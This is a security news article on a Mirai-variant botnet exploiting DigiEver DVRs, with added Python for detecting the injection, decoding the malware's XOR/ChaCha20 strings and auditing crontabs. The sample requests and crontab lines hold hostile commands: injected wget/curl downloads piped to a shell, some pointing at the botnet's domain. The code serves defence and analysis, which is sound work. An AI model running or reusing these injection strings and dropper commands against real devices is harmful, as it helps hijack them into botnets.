Vulnerable DigiEver DS-2105 Pro DVRs are being targeted by a modified Mirai variant that protects its strings with stronger encryption than earlier builds and is spreading rapidly by exploiting a security flaw originally discovered by researcher Ta-Lun Yen.
Mirai-based campaigns dating back to October 2024 have targeted the URI /cgi-bin/cgi_main.cgi on these devices, exploiting it to compromise vulnerable systems.
A new botnet, dubbed “Hail Cock Botnet,” has been exploiting a remote code execution vulnerability in DigiEver DS-2105 Pro DVRs, as well as flaws in TP-Link devices, using a Mirai variant to take over vulnerable IoT devices.
The researcher found vulnerable DigiEver DVRs exposed online and, by analyzing the `/cgi-bin/cgi_main.cgi` endpoint, exploited a vulnerability that gives remote code execution on these devices.
A new attack wave hit DigiEver devices on November 18th: attackers exploited a command injection bug in the ntp parameter, delivered in HTTP POST requests, to make the DVR download Mirai malware from a remote server.
The botnet exploits multiple vulnerabilities, including CVE-2023-1389 (TP-Link) and CVE-2018-17532 (Teltonika), to inject commands through web requests; the injected commands pull down scripts that in turn fetch and execute the Mirai payload.
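The injection pattern described above (a second command smuggled into the ntp parameter of a POST to /cgi-bin/cgi_main.cgi, with wget or curl pulling the next stage) is something a web-log or IDS pipeline can be taught to spot. The following is an added example written for this article, not code from Akamai or from the researcher: a small Python checker that URL-decodes each parameter of requests to that path and flags any value containing shell metacharacters followed by a download utility, plus any ntp value that is not a plain hostname or address. The sample requests are constructed, the tz parameter is a placeholder, and the addresses come from documentation ranges; the TP-Link and Teltonika CVEs have their own vulnerable paths and parameters, which this checker does not model.

```python
import re
from urllib.parse import parse_qs

TARGET_PATH = "/cgi-bin/cgi_main.cgi"

# Shell metacharacters that turn a parameter value into a second command, and
# the fetch utilities Mirai-style droppers use to pull the next stage.
SHELL_META = re.compile(r"[;|`]|\$\(|&&")
DOWNLOADER = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.IGNORECASE)
# A legitimate NTP server setting is a hostname or IP address and nothing else.
NTP_HOST = re.compile(r"^[A-Za-z0-9.:\-]{1,253}$")

# Constructed sample traffic as (method, path, URL-encoded body). These are not
# real captures; "tz" is a placeholder parameter and the addresses come from
# the documentation ranges 198.51.100.0/24 and 203.0.113.0/24.
SAMPLE_REQUESTS = [
    ("POST", TARGET_PATH, "ntp=pool.ntp.org&tz=UTC"),
    ("POST", TARGET_PATH,
     "ntp=pool.ntp.org%3Bwget+http%3A%2F%2F198.51.100.7%2Fwget.sh+-O+%2Ftmp%2Fw%3Bsh+%2Ftmp%2Fw&tz=UTC"),
    ("POST", TARGET_PATH, "ntp=%60curl+-s+198.51.100.7%2Fx.sh%7Csh%60"),
    ("GET", "/index.html", ""),
    ("POST", TARGET_PATH, "ntp=pool.ntp.org&tz=UTC%7Cwget+http%3A%2F%2F203.0.113.9%2Fa"),
]


def inspect_request(method, path, body):
    """Return [(param, reason), ...] for one request; an empty list means clean.

    The method is accepted but not used as a filter: the article reports POST
    bodies, but the same payload in a GET query string is just as suspicious.
    """
    findings = []
    path, _, query = path.partition("?")
    if path != TARGET_PATH:
        return findings
    for source in (query, body):
        # parse_qs URL-decodes the values, so "%3B" is already ";" here.
        for name, values in parse_qs(source, keep_blank_values=True).items():
            for value in values:
                if SHELL_META.search(value) and DOWNLOADER.search(value):
                    findings.append((name, "shell metacharacter followed by downloader"))
                elif name == "ntp" and not NTP_HOST.match(value):
                    findings.append((name, "ntp value is not a plain hostname or address"))
    return findings


def flagged_indices(requests):
    """Indices of the requests that produce at least one finding."""
    return [i for i, req in enumerate(requests) if inspect_request(*req)]


if __name__ == "__main__":
    for i in flagged_indices(SAMPLE_REQUESTS):
        print(i, inspect_request(*SAMPLE_REQUESTS[i]))
```

The ntp allow-list rule matters more than the metacharacter rule: it catches encodings and utilities the regexes do not know about, because a time-server setting simply has no business containing anything but hostname characters.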
The Mirai-based malware protects its strings with two layers, XOR and ChaCha20. At runtime it decrypts hidden strings from its data segment, including “you are now apart of hail cock botnet,” that are visible neither in static analysis nor among the XOR-decoded strings.
The function FUN_00404960 decrypts strings with an XOR operation. One of the decrypted strings is the 16-byte constant “expand 32-byte k,” the initialization constant shared by Salsa20 and ChaCha20, which indicates that one of those stream ciphers protects a further layer of strings.
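The two-layer scheme described above, an XOR table whose decoded entries include the Salsa20/ChaCha20 constant and a stream-cipher layer that only yields its strings at runtime, can be reproduced end to end. The Python below is an added example, not Akamai's tooling and not the sample's own code: it XOR-decodes a constructed string table, reports the entry equal to "expand 32-byte k", and then implements ChaCha20 as specified in RFC 8439 (checked against the RFC's block test vector) to decrypt a second-layer string. The single-byte XOR key 0x22, the table contents, the ChaCha20 key and nonce, and the ciphertext blob (produced here because the real data-segment bytes are not on the page) are all assumptions of this example.

```python
import struct

SIGMA = b"expand 32-byte k"  # Salsa20/ChaCha20 constant for 256-bit keys

# Constructed stand-in for the sample's XOR-protected string table: each entry
# is a string XORed byte-wise with a single-byte key. The key 0x22 and the
# entries are assumptions for this example, not values taken from the binary.
XOR_KEY = 0x22
XOR_TABLE = [
    bytes.fromhex("0d404b4c0d4057515b404d5a"),          # "/bin/busybox" ^ 0x22
    bytes.fromhex("475a52434c460211100f405b56470249"),  # "expand 32-byte k" ^ 0x22
    bytes.fromhex("56474e47414d4f43464f4b4c"),          # "telecomadmin" ^ 0x22
]


def xor_decode(blob, key=XOR_KEY):
    """First layer: the byte-wise XOR the article attributes to FUN_00404960 (key assumed)."""
    return bytes(b ^ key for b in blob)


def find_stream_cipher_constant(table, key=XOR_KEY):
    """Decoded entries equal to the sigma constant: the tell that a second cipher layer exists."""
    return [s for s in (xor_decode(b, key) for b in table) if s == SIGMA]


def _rotl32(v, n):
    return ((v << n) & 0xFFFFFFFF) | (v >> (32 - n))


def _quarter_round(s, a, b, c, d):
    s[a] = (s[a] + s[b]) & 0xFFFFFFFF
    s[d] = _rotl32(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & 0xFFFFFFFF
    s[b] = _rotl32(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & 0xFFFFFFFF
    s[d] = _rotl32(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & 0xFFFFFFFF
    s[b] = _rotl32(s[b] ^ s[c], 7)


def chacha20_block(key, counter, nonce):
    """RFC 8439 block function: 64 bytes of keystream for one counter value.

    The sigma constant occupies state words 0..3, which is why it shows up
    as a plain string once the outer XOR layer is peeled off.
    """
    state = (list(struct.unpack("<4I", SIGMA)) + list(struct.unpack("<8I", key))
             + [counter & 0xFFFFFFFF] + list(struct.unpack("<3I", nonce)))
    x = state[:]
    for _ in range(10):  # 20 rounds as 10 double rounds (column, then diagonal)
        _quarter_round(x, 0, 4, 8, 12)
        _quarter_round(x, 1, 5, 9, 13)
        _quarter_round(x, 2, 6, 10, 14)
        _quarter_round(x, 3, 7, 11, 15)
        _quarter_round(x, 0, 5, 10, 15)
        _quarter_round(x, 1, 6, 11, 12)
        _quarter_round(x, 2, 7, 8, 13)
        _quarter_round(x, 3, 4, 9, 14)
    return struct.pack("<16I", *((a + b) & 0xFFFFFFFF for a, b in zip(x, state)))


def chacha20_xor(key, nonce, data, counter=1):
    """Encrypt or decrypt (same operation) by XORing data with the keystream."""
    out = bytearray()
    for off in range(0, len(data), 64):
        ks = chacha20_block(key, counter + off // 64, nonce)
        out += bytes(p ^ k for p, k in zip(data[off:off + 64], ks))
    return bytes(out)


def rfc8439_selftest():
    """RFC 8439 section 2.3.2 block test vector; True if the implementation is right."""
    key = bytes(range(32))
    nonce = bytes.fromhex("000000090000004a00000000")
    return chacha20_block(key, 1, nonce)[:16].hex() == "10f1e7e4d13b5915500fdd1fa32071c4"


# Second layer. Key, nonce and ciphertext are assumptions standing in for
# whatever the sample holds at runtime; the blob is generated here because
# the real data-segment bytes are not available.
RUNTIME_KEY = bytes(range(0x20, 0x40))
RUNTIME_NONCE = bytes(12)
HIDDEN = b"you are now apart of hail cock botnet"
DATA_SEGMENT_BLOB = chacha20_xor(RUNTIME_KEY, RUNTIME_NONCE, HIDDEN)


def recover_runtime_string(blob, key=RUNTIME_KEY, nonce=RUNTIME_NONCE):
    """What the malware does at runtime: strip the ChaCha20 layer from a data-segment blob."""
    return chacha20_xor(key, nonce, blob)


if __name__ == "__main__":
    print([xor_decode(b) for b in XOR_TABLE])
    print("sigma found:", bool(find_stream_cipher_constant(XOR_TABLE)))
    print("RFC 8439 self-test:", rfc8439_selftest())
    print(recover_runtime_string(DATA_SEGMENT_BLOB))
```

In a real sample the work is finding where the key, nonce and counter come from (a constant in the binary, a value derived at startup, or a per-string prefix); once those are known, the decryption above is all that stands between the analyst and the runtime-only strings.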
The operators are evolving their tactics, adopting more complex string decryption while still relying on common default credentials to spread; this is evident from newly added credential pairs such as “telecomadmin” for Huawei devices and Realtek routers.
Sandbox analysis shows the malware creates a cron job for persistence that downloads a shell script named “wget.sh” from “hailcocks.ru,” trying both wget and curl so the download succeeds even if one tool is missing.
The malware exhibits Mirai-like brute-forcing, connecting to numerous hosts, and communicates with a C2 server at “kingstonwikkerink[.]dyn.”
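The persistence and network indicators in the two paragraphs above (a cron job fetching wget.sh from hailcocks.ru with a wget-or-curl fallback, and a C2 at kingstonwikkerink[.]dyn) are what an incident responder would check for on a suspect device. As an added example that is not part of the original article or the Akamai report, the Python below audits crontab content: it tokenizes each entry's command with shell-aware splitting, then flags remote fetches, wget/curl fallbacks, pipes into a shell, execution of a downloaded file, and references to the two domains. The crontab text is constructed; only the hailcocks.ru line mirrors what the article describes, and 198.51.100.7 is a documentation address.

```python
import re
import shlex

# Indicators named in the Akamai findings this article summarizes, refanged
# (the article writes kingstonwikkerink[.]dyn).
IOC_DOMAINS = {"hailcocks.ru", "kingstonwikkerink.dyn"}
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
SHELLS = {"sh", "bash", "ash", "busybox"}
URL_RE = re.compile(r"(?:https?|ftp)://[^\s'\"|;)]+", re.IGNORECASE)

# Constructed crontab content. Only the hailcocks.ru line mirrors the
# persistence the article describes; 198.51.100.7 is a documentation address.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/find /tmp -mtime +7 -delete
*/5 * * * * (wget -q -O- http://hailcocks.ru/wget.sh || curl -s http://hailcocks.ru/wget.sh) | sh
@reboot cd /tmp; wget http://198.51.100.7/x.sh -O .x; chmod +x .x; ./.x
30 2 * * * /usr/local/bin/backup.sh
"""


def split_entry(line):
    """Return (schedule, command) for one crontab line, or None for comments and blanks."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):  # @reboot, @hourly, ...
        parts = line.split(None, 1)
    else:  # five time fields, then the command
        parts = line.split(None, 5)
        if len(parts) < 6:
            return None
        parts = [" ".join(parts[:5]), parts[5]]
    return tuple(parts) if len(parts) == 2 else None


def tokenize(command):
    """Shell-aware split: '(', ')', '|', '||' and ';' become their own tokens."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    try:
        return list(lexer)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        return command.split()


def classify(command):
    """Set of finding labels for one command; empty means nothing suspicious."""
    tokens = tokenize(command)
    fetchers = {t for t in tokens if t in DOWNLOADERS}
    findings = set()
    if fetchers and URL_RE.search(command):
        findings.add("remote_fetch")
    if len(fetchers) >= 2 and "||" in tokens:
        findings.add("downloader_fallback")  # the wget-or-curl redundancy
    if any(t == "|" and tokens[i + 1] in SHELLS for i, t in enumerate(tokens[:-1])):
        findings.add("pipe_to_shell")
    if fetchers and ("chmod" in tokens or any(t.startswith("./") for t in tokens)):
        findings.add("exec_downloaded")
    if any(d in command.lower() for d in IOC_DOMAINS):
        findings.add("ioc_domain")
    return findings


def audit_crontab(text):
    """[(schedule, command, findings)] for every entry that produced a finding."""
    flagged = []
    for line in text.splitlines():
        entry = split_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        findings = classify(command)
        if findings:
            flagged.append((schedule, command, findings))
    return flagged


if __name__ == "__main__":
    for schedule, command, findings in audit_crontab(SAMPLE_CRONTAB):
        print(f"{schedule!r}: {sorted(findings)}\n    {command}")
```

Run the same classifier over every user's crontab, /etc/cron.d, and the init scripts a DVR actually executes; on embedded Linux the persistence may not be a crontab entry at all, so the behavioural rules (fetch plus pipe-to-shell, fetch plus exec) matter more than the domain list, which the operators can rotate at will.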
Older samples print the message “you are now apart of hail cock botnet,” while newer ones print “I just wanna look after my cats, man.” on compromised systems.
According to Akamai researchers, cybercriminals exploit outdated firmware and retired hardware such as the DigiEver DS-2105 Pro to build botnets such as Hail Cock.
Manufacturers often stop issuing security updates for older devices, which makes them easy targets. To reduce the risk, users should replace end-of-life devices with supported models and, until they can, keep DVR management interfaces off the public internet.